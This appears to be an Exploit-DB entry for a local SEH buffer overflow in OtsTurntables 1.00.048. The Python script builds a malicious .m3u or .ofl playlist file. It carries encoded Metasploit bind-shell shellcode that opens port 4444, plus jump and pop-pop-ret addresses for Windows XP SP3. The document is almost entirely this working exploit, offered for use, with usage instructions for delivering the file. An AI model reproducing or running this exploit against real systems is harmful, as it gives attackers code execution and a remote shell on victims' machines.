OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)

EDB-ID:

15626

CVE:

N/A


Author:

0v3r

Type:

local


Platform:

Windows

Date:

2010-11-28


# Exploit Title: OTSTurntables 1.00.028 (m3u/ofl) Local BOF Exploit (SEH)
# Date: 11/24/2010
# Author: 0v3r
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.048
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

import sys

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x48\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a"
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x32\x42\x42\x42\x32\x41"
"\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x4b\x59\x4b\x4c\x30"
"\x6a\x58\x6b\x52\x6d\x6d\x38\x38\x79\x39\x6f\x4b\x4f\x39\x6f\x75"
"\x30\x6e\x6b\x32\x4c\x71\x34\x34\x64\x6e\x6b\x31\x55\x37\x4c\x6e"
"\x6b\x33\x4c\x55\x55\x53\x48\x57\x71\x68\x6f\x6c\x4b\x50\x4f\x47"
"\x68\x6e\x6b\x53\x6f\x47\x50\x56\x61\x7a\x4b\x72\x69\x6e\x6b\x36"
"\x54\x4e\x6b\x63\x31\x38\x6e\x37\x41\x6b\x70\x4f\x69\x6c\x6c\x4b"
"\x34\x4b\x70\x52\x54\x64\x47\x6f\x31\x4b\x7a\x34\x4d\x46\x61\x59"
"\x52\x48\x6b\x5a\x54\x65\x6b\x73\x64\x41\x34\x77\x58\x74\x35\x6b"
"\x55\x4e\x6b\x61\x4f\x57\x54\x75\x51\x58\x6b\x70\x66\x6c\x4b\x36"
"\x6c\x42\x6b\x6e\x6b\x31\x4f\x67\x6c\x46\x61\x7a\x4b\x63\x33\x66"
"\x4c\x6c\x4b\x6c\x49\x50\x6c\x66\x44\x47\x6c\x53\x51\x6f\x33\x64"
"\x71\x4b\x6b\x41\x74\x4e\x6b\x63\x73\x56\x50\x6c\x4b\x63\x70\x76"
"\x6c\x6c\x4b\x52\x50\x67\x6c\x6c\x6d\x4c\x4b\x57\x30\x43\x38\x33"
"\x6e\x53\x58\x4c\x4e\x30\x4e\x76\x6e\x7a\x4c\x32\x70\x4b\x4f\x78"
"\x56\x62\x46\x66\x33\x61\x76\x75\x38\x66\x53\x36\x52\x75\x38\x71"
"\x67\x32\x53\x45\x62\x63\x6f\x56\x34\x6b\x4f\x6e\x30\x70\x68\x58"
"\x4b\x48\x6d\x4b\x4c\x35\x6b\x46\x30\x6b\x4f\x38\x56\x53\x6f\x4f"
"\x79\x6b\x55\x50\x66\x6e\x61\x48\x6d\x76\x68\x37\x72\x73\x65\x41"
"\x7a\x45\x52\x79\x6f\x38\x50\x30\x68\x4b\x69\x34\x49\x49\x65\x6e"
"\x4d\x66\x37\x6b\x4f\x7a\x76\x50\x53\x46\x33\x36\x33\x42\x73\x46"
"\x33\x57\x33\x50\x53\x41\x53\x32\x73\x6b\x4f\x4e\x30\x75\x36\x31"
"\x78\x77\x61\x73\x6c\x52\x46\x43\x63\x6d\x59\x58\x61\x4c\x55\x52"
"\x48\x4f\x54\x54\x5a\x50\x70\x4f\x37\x61\x47\x4b\x4f\x4e\x36\x30"
"\x6a\x76\x70\x73\x61\x71\x45\x39\x6f\x6e\x30\x30\x68\x69\x34\x6c"
"\x6d\x76\x4e\x49\x79\x66\x37\x79\x6f\x6b\x66\x63\x63\x42\x75\x59"
"\x6f\x7a\x70\x41\x78\x4d\x35\x57\x39\x6c\x46\x57\x39\x42\x77\x59"
"\x6f\x68\x56\x52\x70\x31\x44\x51\x44\x46\x35\x4b\x4f\x78\x50\x4e"
"\x73\x50\x68\x58\x67\x44\x39\x48\x46\x30\x79\x41\x47\x6b\x4f\x59"
"\x46\x51\x45\x6b\x4f\x6e\x30\x75\x36\x50\x6a\x70\x64\x32\x46\x62"
"\x48\x52\x43\x50\x6d\x6d\x59\x4d\x35\x63\x5a\x52\x70\x32\x79\x65"
"\x79\x38\x4c\x4f\x79\x69\x77\x30\x6a\x62\x64\x4b\x39\x6b\x52\x30"
"\x31\x4f\x30\x6a\x53\x6c\x6a\x39\x6e\x43\x72\x74\x6d\x59\x6e\x71"
"\x52\x74\x6c\x6f\x63\x4c\x4d\x50\x7a\x50\x38\x6c\x6b\x4e\x4b\x6c"
"\x6b\x33\x58\x33\x42\x59\x6e\x6f\x43\x45\x46\x39\x6f\x53\x45\x50"
"\x44\x79\x6f\x79\x46\x63\x6b\x50\x57\x71\x42\x71\x41\x70\x51\x50"
"\x51\x33\x5a\x74\x41\x42\x71\x32\x71\x76\x35\x30\x51\x69\x6f\x7a"
"\x70\x72\x48\x4e\x4d\x6a\x79\x53\x35\x6a\x6e\x30\x53\x79\x6f\x5a"
"\x76\x30\x6a\x6b\x4f\x39\x6f\x65\x67\x6b\x4f\x5a\x70\x6e\x6b\x72"
"\x77\x59\x6c\x6b\x33\x7a\x64\x70\x64\x49\x6f\x7a\x76\x76\x32\x6b"
"\x4f\x5a\x70\x30\x68\x6c\x30\x6f\x7a\x57\x74\x73\x6f\x73\x63\x6b"
"\x4f\x38\x56\x4b\x4f\x4e\x30\x4a")


# near jump 928 bytes encoded with Alpha2 encoder
jump = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x51\x5a\x6a\x65"
"\x58\x50\x30\x41\x31\x41\x42\x6b\x41\x41\x75\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x38\x69\x49\x79\x55"
"\x30\x79\x6c\x4b\x4f\x4b\x4f\x65")

nopsled  = "\x90" * 16
junk     = "\x90" * (912 - len(shellcode)) 
nseh     = "\xeb\x06\x90\x90"	           # short jump
seh      = "\x3f\x28\xd1\x72"		   # 0x72D1283F - ppr - msacm32.drv
jump     = "\xe9\x60\xfc\xff\xff"	   # near jump
stuff	 = "\x44" * 10000 

buff = junk + shellcode + nseh + seh + nopsled + jump + stuff



try:	
 	print "\n"	
	print "---------------------------------------------------------------------------------"
	print "|          OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)            |"
	print "---------------------------------------------------------------------------------"
	print "\n"
	
	if len(sys.argv)!=2:
	
     	  	print "Usage: exploit.py <option>\n"
		print "File type options:"
		print "[1] m3u file"
		print "[2] ofl file"
      	 	sys.exit(0)


	if int(sys.argv[1]) == 1: 
		fname = "exploit.m3u"	
	elif int(sys.argv[1]) == 2 :
		fname = "exploit.ofl"
	else:	
		print "Check again the available options!"
		sys.exit(0)
	
	f = open(fname,'w')
	f.write(buff)
	f.close()
 
	print "- File ",fname," created..."
	print "- To run exploit open OTSTurntables 1.00.028 and import the file",fname 
except SystemExit:
	pass
except ValueError:
	print "Check again the available options!"
except:
	print "-Oooops! Can't write file...\n"